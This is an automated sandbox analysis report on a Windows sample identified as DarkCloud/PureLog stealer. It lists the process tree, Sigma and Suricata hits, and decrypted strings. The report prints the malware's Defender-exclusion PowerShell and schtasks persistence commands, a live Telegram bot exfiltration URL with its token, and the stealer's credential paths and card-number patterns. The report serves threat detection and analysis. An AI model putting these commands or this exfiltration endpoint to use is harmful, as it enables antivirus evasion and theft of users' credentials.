Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oS6KsQIqJxe038Y.exe

Overview

General Information

Sample name:oS6KsQIqJxe038Y.exe
Analysis ID:1564115
MD5:4112ac3213933bfc8412b5312d17377f
SHA1:a5db44ae45edadd94dbc4b3e6f2875fa643c43f1
SHA256:b57dfd0e1e8888ec1f8e23e8d8f32409b06367247cef043394a19c7e4f0787fb
Tags:exeuser-TeamDreier
Infos:

Detection

DarkCloud, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkCloud
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • oS6KsQIqJxe038Y.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe" MD5: 4112AC3213933BFC8412B5312D17377F)
    • powershell.exe (PID: 4484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6008 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • oS6KsQIqJxe038Y.exe (PID: 4676 cmdline: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe" MD5: 4112AC3213933BFC8412B5312D17377F)
      • WmiPrvSE.exe (PID: 6020 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • XgbXowhljC.exe (PID: 5436 cmdline: C:\Users\user\AppData\Roaming\XgbXowhljC.exe MD5: 4112AC3213933BFC8412B5312D17377F)
    • schtasks.exe (PID: 5580 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • XgbXowhljC.exe (PID: 4848 cmdline: "C:\Users\user\AppData\Roaming\XgbXowhljC.exe" MD5: 4112AC3213933BFC8412B5312D17377F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkCloud StealerStealer is written in Visual Basic.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

Threatname: DarkCloud

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
    00000000.00000002.2267554201.0000000005600000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
        00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
        • 0x5b14:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
        00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.oS6KsQIqJxe038Y.exe.5600000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.oS6KsQIqJxe038Y.exe.5600000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                0.2.oS6KsQIqJxe038Y.exe.485bd28.2.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                  0.2.oS6KsQIqJxe038Y.exe.485bd28.2.raw.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
                    Click to see the 1 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ProcessId: 4484, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ProcessId: 4484, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\XgbXowhljC.exe, ParentImage: C:\Users\user\AppData\Roaming\XgbXowhljC.exe, ParentProcessId: 5436, ParentProcessName: XgbXowhljC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp", ProcessId: 5580, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", ProcessId: 6008, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ProcessId: 4484, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe", ParentImage: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe, ParentProcessId: 6524, ParentProcessName: oS6KsQIqJxe038Y.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp", ProcessId: 6008, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-27T20:46:40.531766+010020447411A Network Trojan was detected192.168.2.549758149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-27T20:47:05.735029+010020453001A Network Trojan was detected192.168.2.549794149.154.167.220443TCP
                    2024-11-27T20:47:07.500213+010020453001A Network Trojan was detected192.168.2.549795149.154.167.220443TCP
                    2024-11-27T20:47:50.548160+010020453001A Network Trojan was detected192.168.2.549802149.154.167.220443TCP
                    2024-11-27T20:47:52.799467+010020453001A Network Trojan was detected192.168.2.549803149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-27T20:46:31.765029+010028032742Potentially Bad Traffic192.168.2.549740162.55.60.280TCP
                    2024-11-27T20:46:36.371895+010028032742Potentially Bad Traffic192.168.2.549749162.55.60.280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-27T20:46:39.631508+010028523881Malware Command and Control Activity Detected192.168.2.549758149.154.167.220443TCP
                    2024-11-27T20:46:53.237901+010028523881Malware Command and Control Activity Detected192.168.2.549786149.154.167.220443TCP
                    2024-11-27T20:46:54.700939+010028523881Malware Command and Control Activity Detected192.168.2.549788149.154.167.220443TCP
                    2024-11-27T20:47:02.820040+010028523881Malware Command and Control Activity Detected192.168.2.549794149.154.167.220443TCP
                    2024-11-27T20:47:06.716060+010028523881Malware Command and Control Activity Detected192.168.2.549795149.154.167.220443TCP
                    2024-11-27T20:47:17.860928+010028523881Malware Command and Control Activity Detected192.168.2.549798149.154.167.220443TCP
                    2024-11-27T20:47:18.897667+010028523881Malware Command and Control Activity Detected192.168.2.549799149.154.167.220443TCP
                    2024-11-27T20:47:48.470477+010028523881Malware Command and Control Activity Detected192.168.2.549802149.154.167.220443TCP
                    2024-11-27T20:47:52.182326+010028523881Malware Command and Control Activity Detected192.168.2.549803149.154.167.220443TCP
                    2024-11-27T20:47:57.603930+010028523881Malware Command and Control Activity Detected192.168.2.549805149.154.167.220443TCP
                    2024-11-27T20:48:00.603319+010028523881Malware Command and Control Activity Detected192.168.2.549806149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.oS6KsQIqJxe038Y.exe.485bd28.2.raw.unpackMalware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendMessage?chat_id=6732456666"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeReversingLabs: Detection: 65%
                    Multi AV Scanner detection for submitted file
                    Source: oS6KsQIqJxe038Y.exeReversingLabs: Detection: 65%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: oS6KsQIqJxe038Y.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Cookies
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Password
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \Default\Login Data
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \Login Data
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Password :
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: //setting[@name='Password']/value
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: SMTP Email Address
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: NNTP Email Address
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Email
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: HTTPMail User Name
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: HTTPMail Server
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^389[0-9]{11}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^3[47][0-9]{13}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(6541|6556)[0-9]{12}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^63[7-9][0-9]{13}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(?:2131|1800|35\\d{3})\\d{11}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^9[0-9]{15}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(6304|6706|6709|6771)[0-9]{12,15}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Foxmail.exe
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Mastercard
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(62[0-9]{14,17})$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Visa Card
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Visa Master Card
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \logins.json
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \signons.sqlite
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: mail\
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \Accounts\Account.rec0
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \AccCfg\Accounts.tdat
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: EnableSignature
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Application : FoxMail
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: encryptedUsername
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: logins
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: encryptedPassword
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: Select * from Win32_ComputerSystem
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \Cookies
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \Default\Cookies
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \cookies.sqlite
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \cookies.db
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: \global-messages-db.sqlite
                    Source: 0.2.oS6KsQIqJxe038Y.exe.3e2c4c8.3.unpackString decryptor: C:\\MailMasterData
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49758 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49788 version: TLS 1.2
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: #]??Y-)\S.PdB source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: W.pdb4 source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Isyl.pdb source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr
                    Source: Binary string: Isyl.pdbSHA256 source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 4x nop then jmp 0BF99C82h0_2_0BF9927E
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 4x nop then jmp 057FB32Ah11_2_057FA926

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49758 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49786 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2044741 - Severity 1 - ET MALWARE DarkCloud Stealer File Grabber Function Exfiltrating Data via Telegram : 192.168.2.5:49758 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49788 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49794 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49794 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49795 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49795 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49798 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49802 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49802 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49805 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49803 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.5:49803 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49806 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.5:49799 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 162.55.60.2 162.55.60.2
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: unknownDNS query: name: showip.net
